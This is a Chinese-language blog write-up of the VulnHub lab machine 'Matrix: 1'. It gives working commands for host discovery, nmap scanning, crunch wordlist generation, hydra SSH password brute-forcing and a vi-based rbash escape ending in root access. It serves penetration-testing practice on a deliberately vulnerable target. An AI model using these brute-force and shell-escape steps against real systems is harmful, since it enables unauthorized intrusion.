vulnhub靶机:matrix:1

目录

查看靶机的ip

开放端口扫描

解密

字典生成+爆破

ssh登录

rbash逃逸


下载地址:Matrix: 1 ~ VulnHub

Kali地址:192.168.174.128

靶机地址:192.168.174.139

这个靶机是我在刷到的一个视频,讲解这个靶机的博主比较有趣,自己也来尝试着玩一下,这个靶机比较简单,其中要掌握的就是rbash的逃逸.我这里攻击机的使用前期使用的是手机的kali,但是后期发现攻击不到靶机,所以开始使用电脑的kali

首先开始信息搜集

查看靶机的ip

使用的命令是cmd里的for循环遍历

for /L %I in (1,1,254) Do @ping -w 1 -n 1 192.168.174.%I | findstr "TTL="

开放端口扫描

使用本机的powershell,开启nmap扫描开启的端口

这里发现靶机开启80,22,31337端口,尝试对网站进行访问

访问80端口是没什么信息的只有一个炫酷的页面,而31337端口的页面源码存在一段注释

解密

进行base64解码

相当于写入一句话到一个文件,那就把Cypher.matrix当一个目录来访问

http://192.168.174.139:31337/Cypher.matrix

直接下载了一个文件

一眼看就是brainfuck编码,进行解码

他说他忘记了后两位,然后现在我们需要生成一个字典,然后进行爆破

字典生成+爆破

这里用到kali字典生成工具—crunch

crunch--字典生成工具 - wpjamer - 博客园 (cnblogs.com)附上教程

使用kali自带crunch字典生成工具生成密码字典,密码一共8位,已知6
cat /usr/share/crunch/charset.lst 选择要使用的crunch字典字符集范围
选择使用 lalpha-numeric 字符范围,包括a-z0-9

crunch 8 8 -f /usr/share/crunch/charset.lst lalpha-numeric -t k1ll0r@@ > pass.dic

截止到这里我一直还是用的手机版的kali,开启ssh,然后在电脑上进行操作,但是我发现我的靶机,好像在ssh的终端是ping不同的,还是用自己电脑上的kali进行操作吧

hydra -l guest -P pass.dic ssh://192.168.174.139 -f

ssh登录

rbash逃逸

这里就是进行尝试,看哪些指令是可以被执行的。

vim/vi进入之后

:set shell=/bin/sh # 或者用/bin/bash

:shell

我是用的命令:

vi test

:!/bin/bash

然后就进入了bash界面

# 切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin/

到这里就已经完成了rbash逃逸,最后切换到root,密码尝试一下刚刚爆破出来的密码,也是root的密码,成功提权到root

Rbash就是多进行尝试,尝试哪些指令没有被限制,进而找突破口

平时用到的知识点可以从网上爬取下来,拿来主义,当作自己的字典,慢慢学习。

猜你喜欢

转载自blog.csdn.net/weixin_52450702/article/details/128332506